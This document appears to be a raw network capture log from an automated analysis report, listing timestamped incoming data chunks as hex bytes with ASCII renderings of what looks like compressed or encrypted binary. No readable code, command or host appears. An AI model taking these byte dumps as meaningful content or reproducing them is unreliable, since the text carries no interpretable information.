                                                                              2022-06-01 23:53:56 UTC1715INData Raw: 75 09 ff ff 0a 79 7d 14 0a 79 81 0a 79 85 0a 79 6d fa fa fb 15 0a 39 0b ff 04 fa fa 0a 79 89 fa fa 0a 2d 00 14 fa 14 fa 0a 79 8d fd 18 fa f9 04 04 fe 0d 09 79 91 f9 00 fd 18 f9 f9 0b f8 fc 18 f8 0b f8 1c ff 0b 06 00 05 00 05 00 0d 09 79 91 f9 00 14 00 00 00 fa 0d 09 79 91 f9 00 0d 09 79 91 f9 00 fa fa fa fa fa fe 18 f9 f9 0a 79 95 17 ff 09 0d 0a 79 71 f9 06 0d 0a 79 71 f9 06 00 05 fa fa 0a 79 99 00 00 fa 00 fa 00 fa fa fa 14 fa 15 fb fd 18 f9 f9 15 fb 02 ff fa 0a 2d 0d 0a 79 4d f9 06 fe ff fc fa fa fa fa 05 ff fe 14 14 00 fb fa 0d 0a 79 4d f9 06 fc ff f9 15 fd fc ff fa 02 fa fc ff fa fa fa ff ff fd 14 fa fa fa fa 02 ff fc fa 0a 79 69 fa 0a 79 51 03 ff 01 14 14 00 05 14 14 00 00 fa ff ff fb 15 0a 39 fa fa fb ff f9 00 fb ff f9 fe ff ff fd 00 fa fa fa fa 3c
                                                                              Data Ascii: uy}yyym9y-yyyyyyyqyqy-yMyMyiyQ9<
                                                                              2022-06-01 23:53:56 UTC1719INData Raw: 9f 3f 06 72 ed cd 5f d6 a8 67 00 fe 8b 18 b7 bd 9c 30 53 75 8b a7 4d 4e 5a 0b 07 19 eb 43 15 f3 d0 12 cb 94 26 68 1c 28 a2 02 ac 9e 11 9d 69 33 d0 5e 56 53 ea 71 3a 3a d3 c5 01 b1 24 2a 72 74 a9 b9 55 18 17 56 7d 20 28 97 f7 18 16 13 83 02 97 a2 01 9d 17 e5 ca eb 0e 07 ab f0 5f 4d 83 47 11 4b 94 0c 6c 7a 63 bf e3 d3 11 4a b9 18 cf 64 e5 b3 3b c8 98 82 b0 26 f4 33 e9 0e 9f 3c 8f 6b d2 d3 71 60 a3 6c c6 7a 37 5f 37 8f 12 dc 91 ea 25 d9 40 4d 8b 7d f1 0b 41 5d 71 07 28 76 04 76 fc 6f a8 66 af e7 6f 30 b1 dd 52 a5 6d 86 8f b1 23 92 96 e6 28 75 04 d5 94 09 08 c0 63 e6 08 02 d3 06 86 4d f0 a4 7f 1e 0a 0d 17 32 f6 7e 81 16 8a a2 b5 90 5b 1e 54 78 5e 18 28 6f 3d ae f7 76 cb 34 0d 33 12 71 06 c2 4f 56 86 4f a6 88 82 a8 4b 89 9b a9 a6 83 9c fd a7 29 df 84 6c c1 55
                                                                              Data Ascii: ?r_g0SuMNZC&h(i3^VSq::$*rtUV} (_MGKlzcJd;&3<kq`lz7_7%@M}A]q(vvofo0Rm#(ucM2~[Tx^(o=v43qOVOK)lU
                                                                              2022-06-01 23:53:56 UTC1723INData Raw: 52 ad 98 04 a6 d9 bc 3f 10 ac 13 32 e9 85 4a 3e 0c fa 2f a3 4a 8a 50 c4 85 89 1a 1c 6c 50 e3 c6 ca 0e d1 c9 38 16 5e 7a d7 49 1a 60 f1 ee 94 c1 8f e7 f9 cd 17 97 90 70 c9 d3 e0 87 86 c8 d0 26 c8 1e 65 91 a4 40 2b 29 8f ba 44 de b1 93 ec 8a 4c 0d 8d 07 15 ff 8e 4e 3e 3a 1f 70 ed f6 6c bc 87 71 e2 32 f4 cb be e5 02 29 d2 ea c2 e1 70 e6 70 93 82 cd a5 9e f1 ec c8 85 d7 12 2b 93 0e f6 b8 21 7a fa 71 d0 38 2d e5 3e 25 2c 61 a0 ca 5a 3d 38 cb c0 09 b2 30 21 48 64 ae 4b 8c ac d7 8e c2 68 cc 2f eb 1c 8b 0e cf 87 ad 1c 4d 30 23 fd 2b d0 ae 82 8f 27 b5 63 1a fa 9e 72 4a 03 aa 9a 2a 7f d4 1b 60 dd 61 95 92 a8 d5 32 ba fa a0 04 62 4b dd 9c af 1f b0 a6 a1 62 7b 56 f0 eb d7 96 f7 8c 37 95 1c 61 11 2b b0 34 06 bc ea 9d b7 8e 53 5b a8 ec fb 71 26 3d c9 e0 18 de fa 29 ee
                                                                              Data Ascii: R?2J>/JPlP8^zI`p&e@+)DLN>:plq2)pp+!zq8->%,aZ=80!HdKh/M0#+'crJ*`a2bKb{V7a+4S[q&=)
                                                                              2022-06-01 23:53:56 UTC1726INData Raw: cc d8 6a cd af b2 eb f1 9e 64 b8 f2 7f b8 cb 79 17 29 10 ba 5d 12 03 d2 97 fb 77 db 66 02 14 fb 40 c0 2a 81 b8 f3 16 76 05 99 a2 eb 42 29 bf af ff b4 4c 10 b6 26 77 47 49 78 07 85 a0 63 db 93 c5 5d 79 11 2c 99 2a 8d f7 ca 52 c0 bd 0c 02 1b 98 ee 74 f0 9c 8a 46 b4 67 26 d2 47 5c 94 c9 f5 b2 be 13 8c 9c bb 70 d1 00 08 8d d9 00 ad 40 ba 78 54 cc c8 07 1c 6c b1 96 95 db ad 99 78 3f 64 e8 c5 6f a6 bb e8 c0 72 c7 cc 57 20 c3 55 8b da 65 e7 41 00 dc 7d bd 39 08 33 18 40 bd 29 f9 bb f7 41 59 c5 3c 0f d6 73 e7 c6 d3 b9 a9 b2 5f c0 4b df 4e ca 85 e9 f5 bc 17 6f 45 42 e7 34 5e 40 fb c8 c3 f4 4e 13 e3 c9 c1 45 05 8d f7 0d a0 01 0b fa a0 f8 85 8f a6 16 b2 6d 6b 72 ae f5 91 10 79 e3 63 93 46 9e 97 8d 1b 53 79 16 be 39 71 76 7b d1 37 1a d6 fe 13 e8 bf 53 f6 c4 ef fe 24
                                                                              Data Ascii: jdy)]wf@*vB)L&wGIxc]y,*RtFg&G\p@xTlx?dorW UeA}93@)AY<s_KNoEB4^@NEmkrycFSy9qv{7S$
                                                                              2022-06-01 23:53:56 UTC1730INData Raw: d6 86 f0 ff 1b b6 58 44 34 70 31 e3 25 f8 fd 35 24 25 31 dd 89 0d a6 0d 76 63 4b 8e 77 c7 e3 eb 83 12 6e b1 98 e0 dd 98 3e ce db d5 41 74 be 07 c4 d5 6a c9 b2 aa ea 78 48 64 cb 5e 70 b8 6e 7e e1 e3 f0 0a b5 a3 b3 67 49 1b d3 fa 84 60 92 2f 6a ae dd 09 77 9a 7f dd 07 0a 6d 7f d1 84 64 0d a5 54 cd 2d 36 cc 9b 31 b0 6d de c2 bf bf 88 59 8c b0 aa d2 a0 64 d6 52 44 14 a5 1a 1a 70 05 37 e8 cb 0e 8a 53 27 ca 9b 8a 31 43 01 45 97 1e 43 72 c8 7a cf 2e 52 ec 24 9d c1 c7 88 92 b0 85 98 6c 44 db 9d 99 98 52 a0 36 16 35 94 f2 a2 f5 7b 55 f6 47 32 f8 b7 cf e0 ef 04 ef 74 bc 9c 20 6e b5 c4 ab f5 1b 9f 2b 4f e3 8f c9 55 d4 7f 8f 59 93 8b c2 a7 0f 81 1f 0f 66 9e 61 f2 e9 ec f9 3d 9c 81 f6 c5 1d fe ac 22 e4 3a c0 24 19 12 ef 53 c4 63 b2 39 91 f2 86 d6 7f b3 77 37 6c 15 8f
                                                                              Data Ascii: XD4p1%5$%1vcKwn>AtjxHd^pn~gI`/jwmdT-61mYdRDp7S'1CECrz.R$lDR65{UG2t n+OUYfa=":$Sc9w7l
                                                                              2022-06-01 23:53:56 UTC1734INData Raw: fd d0 48 89 dc a9 c5 73 3f 43 9c 95 51 15 fa 8f c9 62 f6 c2 99 58 c9 26 21 67 ac ef e1 c7 ec 36 1f ab 13 69 07 28 52 57 4d b4 d7 b1 c2 c6 0e f9 80 e9 54 89 2b 6a 2e 5a 45 1d 79 76 ed 2a 5c 09 ae 28 44 0d a2 d2 e0 2c 4c 22 db f2 4a 9a cf db df cf 55 48 de cf ad e5 78 e0 c6 53 69 ae 5d fa e5 69 2b 91 0d 8f 26 4a 4c 2d 90 5e 28 58 0e 83 c8 97 be f5 f9 50 a3 83 a6 0f bb 9b ed 0e 30 55 8f 8c 25 66 d5 99 90 15 24 7e b2 74 45 ab 4e 7a eb 39 6f a8 a3 9c 7b c4 15 4b cb 23 29 f3 13 c3 0e 3f f5 e5 0d d1 2a 69 25 44 e8 92 27 aa 18 95 59 71 95 9b a2 21 2c 89 5c 2e 88 ff be b2 2c d9 a1 0a 56 ad 2f dc 30 fc 13 2a 78 27 da 26 bc 54 79 9e fb 36 0b 4d 6e 09 c4 86 6f 61 f2 bf 77 1e 3f 98 ff 4b 37 3b 5d 31 74 f6 7f 93 be 32 b9 ba 85 1c 39 ff a8 f1 e8 d5 be 0b c4 b0 f5 1a 81
                                                                              Data Ascii: Hs?CQbX&!g6i(RWMT+j.ZEyv*\(D,L"JUHxSi]i+&JL-^(XP0U%f$~tENz9o{K#)?*i%D'Yq!,\.,V/0*x'&Ty6Mnoaw?K7;]1t29
                                                                              2022-06-01 23:53:56 UTC1739INData Raw: a5 d2 6c 35 67 c5 10 5b ce 85 11 ce c6 af 29 8d 3d c4 c4 dc 7c f9 04 8b a4 9a 7e 73 d4 fe c5 9b ef 7e 92 e7 5f 82 03 10 9e fa 03 a5 6d 11 d6 c8 3a 59 e3 b0 c3 3e 8a 20 5e 56 48 e9 12 3a 42 ed 16 99 e5 45 b9 2c a3 6f e8 04 4e c0 3d b1 f4 3c 43 e8 06 c0 e3 87 4e 77 93 70 d2 2d 5a 2a 8e f6 ee 6f 84 5b 20 8d 93 3c 44 1c 51 77 aa d1 8a df af 18 18 7c b5 14 11 22 1d 16 92 a2 52 d8 e2 70 b3 d7 4c c7 45 c1 02 ea 42 d8 2e c8 3e 74 ab f2 b1 c8 da 59 f7 95 2f b2 79 e8 06 ba 05 ff 0b 25 63 08 bc e9 ed 4a ed c1 79 82 74 cc ee 4c 92 0b ca 1d ae fd 0e 60 8f cb d2 28 f7 00 3b 7c 1c ca 29 29 a4 13 39 db a6 29 60 02 b1 43 d3 d3 c7 dc bf b3 53 f3 84 96 ad 07 9e 26 5d 3d 26 0f 5d 15 8e e6 fa e2 4d d1 1a 56 4a 78 32 1b 92 82 2a 5f 70 ab 04 4d 3c 35 59 d8 84 5f eb e1 f7 c5 48
                                                                              Data Ascii: l5g[)=|~s~_m:Y> ^VH:BE,oN=<CNwp-Z*o[ <DQw|"RpLEB.>tY/y%cJytL`(;|))9)`CS&]=&]MVJx2*_pM<5Y_H
                                                                              2022-06-01 23:53:56 UTC1742INData Raw: a4 0e c1 32 df 6a 20 1f 13 c3 35 6c 8d cf 9a 28 b7 ee 2c 82 7a 12 ab ad c3 77 eb 6d f3 a2 7b 46 1f 40 4e 8b ec c5 ac 74 9a e9 ca ef bf 42 37 b1 c5 a4 1c 39 aa b4 a9 f4 69 8c cb 4e 5b 5f cf cd c0 25 fe eb 1b 32 bd 8c 60 f2 f5 82 9a e6 cf dd 8f 51 55 8c 4a 30 71 ea 52 a9 38 24 68 16 4c 3b 2a ec eb 20 31 d2 0c 58 97 f2 4e 3e 60 86 2d cc 6e bd 47 1f a3 b0 3f 1e 7c c0 f0 1a 28 58 27 53 2b cd a9 fc f5 24 c8 78 34 98 75 c4 81 52 55 f2 13 06 27 3e dc 7b 94 1c 87 c7 a1 dc 12 93 00 7a 44 c6 10 4b 76 20 0d a8 d5 98 09 91 63 b9 63 1f a1 ea 91 5b ee c3 a1 f8 89 a0 06 be f2 f6 17 4a 54 96 5b 08 bb 14 c6 a4 b4 c0 0e e6 9b ee 8c e7 b3 98 ab 81 9a 9f d4 92 f4 93 d0 28 5e 5d b6 db 78 28 c1 27 61 ed a2 20 41 4d e2 ab d2 20 44 bf 68 66 5b 0f fc 5a b7 35 e9 06 10 8c dc 0f 31
                                                                              Data Ascii: 2j 5l(,zwm{F@NtB79iN[_%2`QUJ0qR8$hL;* 1XN>`-nG?|(X'S+$x4uRU'>{zDKv cc[JT[(^]x('a AM Dhf[Z51
                                                                              2022-06-01 23:53:56 UTC1746INData Raw: e0 b9 d9 67 d5 4c 3a 1f 41 02 35 89 3d f3 38 22 5a 8b 33 60 25 51 b2 1d b8 55 9c 4e 9d a0 72 d2 24 62 af de bd 6b 32 49 0f 61 f6 dc 29 5f f6 e4 f3 8b c8 79 35 07 90 2d 10 53 0e 4c 9d d4 79 08 3a a5 a8 7b 29 a3 c8 7e 65 01 fb 32 b5 b1 8d aa 41 a7 02 15 72 fe 59 0c 7c 93 f6 e3 34 3e ec e0 3f 94 1e e1 2e 3b c1 05 4f 92 b9 55 d0 55 f8 e1 82 2f 04 da e1 12 88 ba 25 37 6e c5 97 4c 9e 07 11 93 a2 34 03 7e 2e ab b5 94 59 42 d4 fc 52 64 b5 ed ec a4 e6 9b f1 36 08 f2 9d 61 ea 69 52 0d a6 85 86 cd 3c a0 e1 0c ee 98 4f 4e 20 e9 de 0e 68 ac bd db b8 85 26 e8 44 33 b7 05 05 43 02 5c 33 34 8e 80 f0 8e 92 c0 ee 53 75 b0 63 34 08 b5 f2 48 77 8a bc 68 3b f5 e5 21 3b 0e 14 9d 3b de e4 b9 a4 d0 d5 29 f6 c6 e6 14 eb b1 da 56 72 24 6f 8e d4 0a c6 dd e0 d5 fb 5a 61 6b 32 b7 93
                                                                              Data Ascii: gL:A5=8"Z3`%QUNr$bk2Ia)_y5-SLy:{)~e2ArY|4>?.;OUU/%7nL4~.YBRd6aiR<ON h&D3C\34Suc4Hwh;!;;)Vr$oZak2
                                                                              2022-06-01 23:53:56 UTC1750INData Raw: cc 94 32 4d d5 c5 9b 9a 81 5e 80 24 18 4f 07 f4 bd 30 b4 3c c7 10 28 e5 4c c3 8b ad 1b 80 b4 ec 1a e8 50 6f 34 32 33 2c 91 04 71 b3 86 cc 0e e5 d5 9a 12 41 c5 de d3 08 b3 1a 71 b4 2a c4 c8 3a 06 d6 c5 d4 6b 24 a6 52 22 c9 d4 87 9b aa 34 4e a3 72 c5 69 01 93 8c d8 8c 0b 42 67 e3 18 2a 9c ad be f0 92 df 9e 31 b7 fb 94 2b 32 f1 f9 91 47 47 e3 54 3f 53 d3 e2 50 2b 52 00 79 57 cd 79 3e 2b 4e 6f 59 73 00 4f bb bd 3b 76 e6 78 ed a3 8f dd 44 c4 64 77 49 2b 4a ff 65 6d 46 a0 19 c0 0d 51 36 ac c9 c2 ff ff a5 b4 0f f3 0b b0 b5 51 69 1a 53 26 f9 25 7f d4 3d 25 66 04 02 6c f5 63 57 41 24 bc 88 96 98 7b 7a 56 4a 18 18 d7 fc a5 5f db 42 9b 4b 51 80 e4 a7 59 57 5c d0 97 23 d5 ea 8f 86 8c 7e 8c ff 72 57 01 ba d3 55 c2 46 57 60 68 b9 d6 44 e9 2f 37 05 c7 de dd 6c 5f 69 6b
                                                                              Data Ascii: 2M^$O0<(LPo423,qAq*:k$R"4NriBg*1+2GGT?SP+RyWy>+NoYsO;vxDdwI+JemFQ6QiS&%=%flcWA${zVJ_BKQYW\#~rWUFW`hD/7l_ik
                                                                              2022-06-01 23:53:56 UTC1754INData Raw: 70 9e ed fb 8d e9 e2 c4 74 09 fb 68 8a 65 f6 7a b6 65 ae c6 0f cd 75 22 c5 f0 0c a1 92 88 b8 06 be ee 26 17 95 cd 01 18 ea 8d 16 e0 7a 15 ac 8d 82 6f bf a4 05 8e d5 9d d1 84 b6 a0 15 b3 64 20 b2 7d 0a d4 fa e9 a9 0f 57 37 ed e2 67 e8 bf b3 c8 59 d8 50 07 f5 fb 76 07 2d a8 d1 1f 4e 93 5e 39 48 7d 75 7a 6a 8a d6 4f af 75 e5 8a 48 24 f4 91 1c 49 cf 75 fe 55 77 0e 8e 1c 5e e3 9c 67 16 2a 34 17 fc 2b f1 f5 6d fd ee 32 c8 48 19 d4 45 b0 50 5b 0c 4c 37 fa 3d 89 55 dd 5c 30 16 bd b6 f5 d7 e8 3e a7 82 b6 1a 16 29 6d 5b 95 d7 a9 f8 e9 e3 0a 06 86 9a 4d a0 7b f0 bf 57 85 ae 50 c1 91 f8 81 28 f7 36 0d 38 b6 1d da 69 84 45 3c d6 4e 9f ee c4 e6 69 17 5e 2d 09 97 29 0b e2 a4 fd 37 d8 21 f0 4f b0 60 79 30 72 b7 d6 d8 3b 12 ad bd 73 0c f8 a9 77 52 cd 40 ed e3 60 b7 17 1f
                                                                              Data Ascii: pthezeu"&zod }W7gYPv-N^9H}uzjOuH$IuUw^g*4+m2HEP[L7=U\0>)m[M{WP(68iE<Ni^-)7!O`y0r;swR@`
                                                                              2022-06-01 23:53:56 UTC1758INData Raw: af a9 f8 55 4c 9b 78 3a d9 b0 53 a7 7b 13 c0 30 d0 39 f5 5f 0d 01 4b 22 a9 3e 19 41 f6 04 58 33 17 09 6e 31 e4 84 da 27 5f fa 0a 86 c9 53 03 33 a8 ad b0 3a 2a 04 21 3d 60 60 6a 76 2e f8 21 46 23 57 53 40 50 2e 3f 84 3b f5 f3 47 1a dd f7 3f 21 f7 03 c8 e1 e4 6b a3 63 18 03 48 e8 2f c3 11 57 b0 a9 6f d4 71 12 ba 7d 70 33 34 ae 1c cf 0f ec bc d8 c5 1a e5 26 46 47 31 fd 1d 9c 5d e5 55 72 d3 d5 8d 24 7a 4a 17 5c 89 14 77 77 b2 bc 23 7f 26 38 57 a7 7f 14 5d 1b ea 8f 48 e8 80 d4 fb e2 eb fd dd df 28 f9 19 4f dc 21 d3 88 13 3b 22 76 b0 5f 59 8f fd 1f db e9 f0 dd 42 7f a6 a3 0a 1f e8 9a 53 1f 72 12 e0 2d fa 1b d5 be 67 f8 8a b1 92 6b ba 50 19 17 b0 91 e9 ae 2f ff 4a f3 b7 8c ab 4c 70 db f1 f2 57 6f 4a 8f d4 7d 86 ff fb 52 8e d4 f4 68 8d eb 38 5d 3d d3 35 1d cd 23
                                                                              Data Ascii: ULx:S{09_K">AX3n1'_S3:*!=``jv.!F#WS@P.?;G?!kcH/Woq}p34&FG1]Ur$zJ\ww#&8W]H(O!;"v_YBSr-gkP/JLpWoJ}Rh8]=5#
                                                                              2022-06-01 23:53:56 UTC1762INData Raw: ac d7 55 c4 cd 89 d8 9b 5d e9 a5 65 10 50 8e 1b 33 f3 c8 6e 61 2d 83 99 b1 cc 0d ad a4 7e 71 90 05 7e eb d5 4c 7d 06 e5 c4 85 4c 54 1f e3 7c a0 71 4e ce f3 4b ef 97 9e f5 71 65 4c db d7 f7 80 8d ee ef 9d 60 7d 74 39 c9 df 7e ff 85 fe bf cd 03 8a 39 1c 76 d9 dc 8c 57 f7 ff f3 b4 d3 64 f5 a2 00 14 1c 97 9d d2 6a 3e c4 22 9c 25 f1 0d 80 fd 21 6a 74 46 8a b5 60 3e b4 24 18 26 dd f0 2f e1 0c 09 dc 7a 3e fb 5a a8 92 1c a2 f0 75 f8 6b 8b e4 0c f1 7e 4e 32 34 79 34 7d 99 7b 9e de 86 2e a0 06 61 93 6e 0b 68 54 d8 57 60 2f 5a c6 16 ae 9a 43 73 16 6f 7f b0 71 3a b3 b6 15 4a 63 6b 2e d4 54 22 50 0e cb e6 86 62 ee 2f d2 9c be 69 5d 0a 19 70 2b 48 81 48 97 20 68 ee a9 c0 f2 ba dd db dd 32 83 4c 90 41 2a 3e 90 fb 6a c8 e1 6d b1 d5 5e 0d 2b 97 85 43 4e c3 9a c5 e4 b2 cb
                                                                              Data Ascii: U]eP3na-~q~L}LT|qNKqeL`}t9~9vWdj>"%!jtF`>$&/z>Zuk~N24y4}{.anhTW`/ZCsoq:Jck.T"Pb/i]p+HH h2LA*>jm^+CN
                                                                              2022-06-01 23:53:56 UTC1765INData Raw: ce e2 5b 41 1e 20 a1 12 a3 b0 9f d8 63 4d cd 7f ee a6 03 77 bb 43 42 3b ac f1 7d b0 b9 aa 95 15 ed 18 a8 05 8c b8 6a 3b 62 f2 9f 23 ce 06 42 0a 5f ac 29 d4 98 28 52 a8 14 ce 1f d5 3c 16 10 26 f0 ce 69 47 e0 13 88 16 ae 57 f7 c5 7e 8b 99 60 e9 39 fe ad 7a 03 db 93 8e 00 58 ad e1 04 28 3e 19 e4 3f a6 a3 0f 3c 9e c7 81 23 71 b3 4d c7 8e 8f a6 94 bb fa af 3b 26 21 2f 29 07 5a 2e 70 7d b2 73 da 94 58 41 14 2b 85 58 fe a0 b2 ec 4f f4 52 95 ce 8e fe 40 74 1a bf b6 36 c7 27 96 09 4c be 19 49 e0 04 05 92 8b 2d 5e f5 6c 75 8a 24 18 1e 14 b9 98 9b e7 a7 f1 ae 2d 57 15 09 94 14 0e 4e fb 3f b5 b2 4c 6b 53 18 ea 6f 8b 25 d9 d4 e6 5f 8c de 95 9e 4d 0a 74 ac 11 e7 e7 ce 00 f3 82 d2 c1 48 00 f7 58 b7 ff eb 6b e6 1e 70 e5 b4 5e e7 c2 c2 08 70 15 25 a9 00 be 08 79 c0 09 40
                                                                              Data Ascii: [A cMwCB;}j;b#B_)(R<&iGW~`9zX(>?<#qM;&!/)Z.p}sXA+XOR@t6'LI-^lu$-WN?LkSo%_MtHXkp^p%y@
                                                                              2022-06-01 23:53:56 UTC1769INData Raw: b1 ff 62 ef 22 cc 6a af 1c 97 1e 08 5f f1 e3 20 9b 35 75 e6 c7 bf dd 16 d1 d9 7f 92 5e 51 ec c0 93 4b de 74 f3 70 9f 7b 5a 8b ab dd 19 13 ef 46 9d f6 86 fe b0 55 73 ba f3 7d cc 20 97 64 2b 58 0e dd e7 e9 cb 81 1b 0e e9 26 ff 57 71 47 bf cc a3 8e 49 c4 a0 29 1b 2c 03 f1 ac b4 59 b6 d9 20 84 18 75 4a 32 83 f9 21 9f 33 0b 8c ab 1b fe 14 a3 90 23 1b 65 65 98 a8 f7 f7 0b d2 62 61 54 46 2e 47 6a 9d c2 50 f3 49 dc 02 15 65 4f cf 1b 3c 5e c8 af 3a 7b 52 ce 96 dd 7e 77 7b 37 72 65 2a e6 52 6c 02 83 61 7b d1 3d 3c 08 45 a1 24 c6 86 19 57 67 24 58 d6 b8 8d 5c 9e ea e7 b6 e8 fe 76 e2 7c c0 ca 45 73 9f 60 58 c4 02 73 b9 53 1b d1 da 49 f8 be 74 2b 2c 44 2a b4 fd d3 8e c4 ca c0 4b e7 0b d1 65 a5 34 72 d0 50 41 86 76 ba 5e 4d ac 7e c9 fc f7 0a a0 a7 05 a3 8d d8 d0 53 39
                                                                              Data Ascii: b"j_ 5u^QKtp{ZFUs} d+X&WqGI),Y uJ2!3#eebaTF.GjPIeO<^:{R~w{7re*Rla{=<E$Wg$X\v|Es`XsSIt+,D*Ke4rPAv^M~S9
                                                                              2022-06-01 23:53:56 UTC1774INData Raw: e7 82 84 e6 23 ef d7 86 65 ed dd e6 ff 8f 03 3f 67 cb 67 48 c2 f5 44 d9 e5 67 02 01 30 23 a0 30 94 d1 6a 06 fa 5c c6 78 99 0d 8a 7c 41 71 1c e2 c3 54 92 28 bd 9d 57 5f 09 42 bc 20 c6 77 6e 22 51 5f a5 56 18 4c ab 8a a2 28 a2 f9 e2 07 2e 0c 81 52 09 27 0e e6 14 d0 af 62 5e 28 b7 ef 1d 14 b2 3a da 3f 0a 43 9f df da 87 3f 88 46 bb 96 db 02 d8 d4 a8 73 d5 87 d4 b7 cb 20 f9 42 e7 80 d3 39 01 e5 e3 ca 20 04 c5 d9 98 09 32 17 e3 88 0d 31 18 25 2c e1 e3 dc 92 ed fd d5 b2 85 b8 75 ff 54 29 0d 88 92 2a e7 cc ed ae 4c bc 67 f9 60 7a af df 07 35 0a 67 95 fc 9c 66 51 bd 9f 7b 7c ef d3 04 b5 75 84 31 d1 db d0 b5 af d7 e5 4f 36 b0 b0 cf 0a a1 bb 3d 0f f1 21 1d 6a d0 d0 34 1a 5d 29 47 aa 66 7b d3 a0 7e b7 d8 73 33 76 a6 a2 c0 94 23 c0 00 01 66 a5 a8 5d cd 3a 5a 64 e9 88
                                                                              Data Ascii: #e?ggHDg0#0j\x|AqT(W_B wn"Q_VL(.R'b^(:?C?Fs B9 21%,uT)*Lg`z5gfQ{|u1O6=!j4])Gf{~s3v#f]:Zd
                                                                              2022-06-01 23:53:56 UTC1778INData Raw: cc 13 d8 d8 f9 2a 6f 95 34 72 39 8b 01 b9 6d 62 15 f9 a9 a9 63 19 9b e6 d5 9c 6e 93 6b 55 7b ff 89 16 f7 4c 00 8c ee 77 07 67 44 52 29 55 3d 97 c4 ed 0a 83 a8 5a b8 26 53 7a 67 79 3e e8 fd c7 1f f6 85 4d 47 7e 6b ef 63 f2 cf 57 3a a6 d1 ec a8 7a 45 13 6b 1a 1e c9 a6 78 35 5d 21 07 12 4d e3 f7 1a 8f f1 4b bc 6f b6 73 93 23 c9 23 1f a1 25 4a 16 ac 6b 77 67 27 b5 f0 e0 95 68 b0 3d 54 1a b8 79 24 b5 42 c0 5e af c6 bb fe fd 9c 54 57 5e 68 ee 1f 88 ca 8d cb 74 e8 6f dc 84 9f b3 04 96 0b 2b 74 db a7 64 16 2c 83 f6 49 22 c7 13 cb 5f b0 7a c3 fe c6 5c 7b 0a 78 17 91 e7 6a 88 5e 41 a8 35 e5 48 62 d7 04 24 71 3d af 3e d2 99 85 16 94 0b 3b f9 17 21 37 af 99 e2 2d b8 33 0b 09 70 96 12 e4 37 0c 2a b6 eb c4 c4 60 47 2a f5 f5 04 8f 0d 7a 2d ae f6 d7 03 ac fe 0d 7a fe de
                                                                              Data Ascii: *o4r9mbcnkU{LwgDR)U=Z&Szgy>MG~kcW:zEkx5]!MKos##%Jkwg'h=Ty$B^TW^hto+td,I"_z\{xj^A5Hb$q=>;!7-3p7*`G*z-z
                                                                              2022-06-01 23:53:56 UTC1782INData Raw: 72 f0 4e 8b 94 73 1e 17 e4 2f 86 29 a7 10 a8 de c8 f0 e4 97 d5 76 0e 55 b0 8a 9f 5b e4 77 f0 a4 0a 2d a3 66 b0 d7 64 7f 5e 5a 9d a0 9a 19 1f 01 a4 0a 8d e0 ff a5 3d d0 fc 39 47 43 11 48 fc e2 ed 9a d7 91 c6 32 1d 54 04 5f 61 21 ae 79 b6 f9 ba a2 58 4a 7a 23 14 25 9e 28 e2 b6 8e aa 76 6a 90 2d 6f ae 6e 93 92 0d 60 37 65 20 51 b7 49 1e ed f0 4e 1c 6f 12 b3 07 0c 4f 99 84 92 ba b4 fb 79 9c e0 27 7c f4 4a 06 5e 14 7e 40 63 3a c0 a6 1f 1b 5d 8c 8a b9 7f e8 48 7e ae 72 95 b7 95 f6 c1 6a ac 64 37 4b 91 32 ac 13 f8 ab a9 43 ca 89 b3 1d 1a 86 01 59 3b bf 37 f2 0a 6d a4 49 9a a2 fe a9 40 93 3b 8a 50 de d5 95 9c 26 3d e9 f4 40 50 f3 80 5d b1 0d 13 a7 2a e5 ec c8 d7 eb 53 ed cd 3c ee 0b 9a 06 a7 7b 81 a8 f5 a9 1f 81 8e d7 e2 88 21 4c ac 11 fb 79 bb 40 d2 1d a0 aa 5d
                                                                              Data Ascii: rNs/)vU[w-fd^Z=9GCH2T_a!yXJz#%(vj-on`7e QINoOy'|J^~@c:]H~rjd7K2CY;7mI@;P&=@P]*S<{!Ly@]
                                                                              2022-06-01 23:53:56 UTC1786INData Raw: 04 5f 07 bb 39 ce ba dd 48 82 d5 e4 10 ae 02 39 bd 2c ee 0a 7c 03 bb 91 66 7e 83 69 f7 f0 2c 09 d0 64 7d 74 40 5a ec f9 a7 20 35 b6 e5 35 14 64 e9 44 2a d7 bd b1 fc e3 1f 80 3b 3d 2d 60 22 eb 97 c2 90 e3 83 fc f0 53 8f 55 b5 94 a8 cd 98 f6 39 51 ca cb a3 4d 9a 41 3f ae c8 15 48 78 60 34 7d 64 b4 94 21 02 a5 5f ce e3 99 4c 11 8a 11 13 ac 9a 5c 98 b8 ae 6e b0 a3 d6 06 3f 1a 0b 17 b7 35 0b 41 e7 e6 25 88 bf 5d a0 e5 49 a9 81 98 c7 b5 60 6f bf 6e 8e b5 f3 87 3a 0a 53 96 3e 00 7a cd 5c da 88 0a e3 c0 18 91 fc 54 48 91 99 08 b7 9a 79 65 dc 06 5a 5f 5d 12 55 e3 2e f5 58 e9 47 c1 85 2c 31 13 d6 cc c4 ea 12 88 91 d5 ff e7 f4 e7 20 aa 6c e9 ba 20 ab 0a 34 98 b9 40 87 34 09 23 3a 95 46 4c 27 03 fa 14 3c 2f 15 fa cd 92 eb d1 72 b8 23 3e ce 42 04 2e 92 29 b8 a2 03 fd
                                                                              Data Ascii: _9H9,|f~i,d}t@Z 55dD*;=-`"SU9QMA?Hx`4}d!_L\n?5A%]I`on:S>z\THyeZ_]U.XG,1 l 4@4#:FL'</r#>B.)
                                                                              2022-06-01 23:53:56 UTC1790INData Raw: 7d bc a3 27 e2 4c 52 cc 4f 8a b5 53 2b 75 7c b7 06 15 4b 28 93 77 26 86 ae 7d d2 8a db 8a 1a 5b 41 6e f3 de 24 17 0f 0e 85 8a 3d 00 c1 c3 53 10 8a 48 ab da 0b 7a 8e 20 5a ad 3c 8e 43 4a 2b 90 82 c2 23 11 01 2c ac 9d 9f c7 c0 2d 59 22 53 6a bd 38 83 34 ec 60 23 f8 d3 0f de 53 02 f2 e4 02 ec 19 58 5c 43 8b c5 0b d0 a7 ff 24 89 62 0b 6c e6 19 6a fc 41 ea a8 25 70 fc 90 03 76 54 e4 1a 6f d9 16 79 8f 4d 5e a8 0e 93 9d c4 74 4d 43 b1 81 43 94 8c ea de 65 92 58 67 c3 95 d4 f3 49 a1 8a 86 7f dc 9f 68 7e 3b 35 46 15 58 28 70 00 49 65 c2 5b 8f d8 ea ba 24 c6 df a3 16 c4 4a 44 00 d0 78 96 6a b5 9f e8 72 9f 3c 5b 78 0b e0 bb 70 3d ab 69 09 9b af 6f 6f 4f 09 70 75 28 6f c7 8a 2c df b5 f8 0c 56 39 c4 cf 1b 32 03 fd 0b 2d 44 22 2b 10 b3 c3 4a d8 60 f4 b3 f0 31 